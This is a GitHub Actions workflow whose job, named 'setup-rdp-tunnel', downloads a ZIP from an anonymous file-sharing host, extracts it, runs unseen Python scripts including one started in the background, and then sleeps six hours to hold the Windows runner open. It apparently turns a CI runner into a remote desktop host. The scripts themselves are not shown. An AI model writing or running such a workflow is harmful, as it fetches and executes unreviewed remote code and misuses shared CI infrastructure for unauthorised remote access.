name: cl-test

on:
  workflow_dispatch:

jobs:
  setup-rdp-tunnel:
    runs-on: windows-2025

    steps:
    - name: Check out v4
      uses: actions/checkout@v2

    - name: Download full ZIP and extract
      run: |
        curl -L -o code.zip https://pixeldrain.com/api/file/gfdfgb34/info/zip/main6.zip
        Start-Sleep -Seconds 5
        powershell -Command "Expand-Archive -Force code.zip extracted"


    - name: Install requests package 2025
      run: python -m pip install requests
      
    - name: Start test.py
      run: |
        cd extracted
        Start-Sleep -Seconds 30
        python test.py

    - name: Start main.py-556
      run: |
        cd extracted
        Write-Host "Starting main.py in background..."
        Start-Process python main.py
        Start-Sleep -Seconds 10

        
    - name: Run test run
      run: |
        cd extracted
        Start-Sleep -Seconds 10
        python test2.py
        python test3.py

    - name: alive-v885
      run: Start-Sleep -Seconds 21600 
